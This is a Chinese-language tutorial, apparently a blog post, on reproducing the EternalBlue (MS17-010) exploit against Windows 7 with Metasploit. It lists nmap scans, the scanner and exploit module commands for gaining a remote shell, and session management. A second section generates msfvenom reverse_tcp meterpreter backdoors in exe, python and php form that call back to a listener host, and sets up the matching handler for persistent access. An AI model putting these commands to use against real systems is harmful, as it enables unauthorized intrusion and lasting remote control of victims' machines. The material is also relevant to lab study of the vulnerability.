1.metasploit-win7永恒之蓝-ms17_010复现

开了防火墙的话可能都ping不通,需要各种绕过

一、前期工作:

1.首先信息收集,获取真实IP,然后扫描,很多种,参数太多:

nmap -O -p445 ip:检查是否开启445端口及主机操作系统

db_nmap -sT -T4 ip:快速扫描,db是database

2.然后看有没有漏洞,需要对漏洞有一定掌握

3.在metasploit下查找漏洞的使用模块和扫描模块等,下面利用win7的永恒之蓝漏洞:

search ms17_011:查找该漏洞的相关

img

4.先使用该模块扫描看看有没有该漏洞:

(1)进入模块并且配置模块信息:

use auxiliary/scanner/smb/smb_ms17_010

show options

img

set RHOSTS ip

(2)使用该模块来扫描:

run或者exploit

检测到可能有,那么使用攻击模块:

5.使用攻击模块进行攻击:

img

set RHOSTS ip

exploit

6.得到目的主机的shell:

img

7.为了不乱码,设置编码格式为utf-8:

chcp 65001

8.调换至后台,输入sessions可以查看,sessions id可以进入:

background

sessions

sessions id

9.为了更好利用,调换至meterpreter模式:

sessions -u 1

img

二、生成后门程序传到在目标机器上,这样下回目标机器运行该程序,主机监听到之后就可以直接进入了,不管漏洞在不在。

1.生成后门程序:

①msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.80.158 lport=8881 -f exe > localmsf8881.exe

②msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.80.158 lport=8881 -f raw > localmsf8881.py

③msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.158 lport=8881 -f raw > localmsf8881.php

可以生成很多种后门程序,只要在目标机器上运行,那么就可以利用

2.本机上使用模块,设置payload和监听端口:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.80.158

set LPORT 8881

run

3.现在如果靶机上运行localmsf8881,就会传回信息给主机,主机上的这个命令行就会得到一个meterpreter的session,之后就可以进入了

img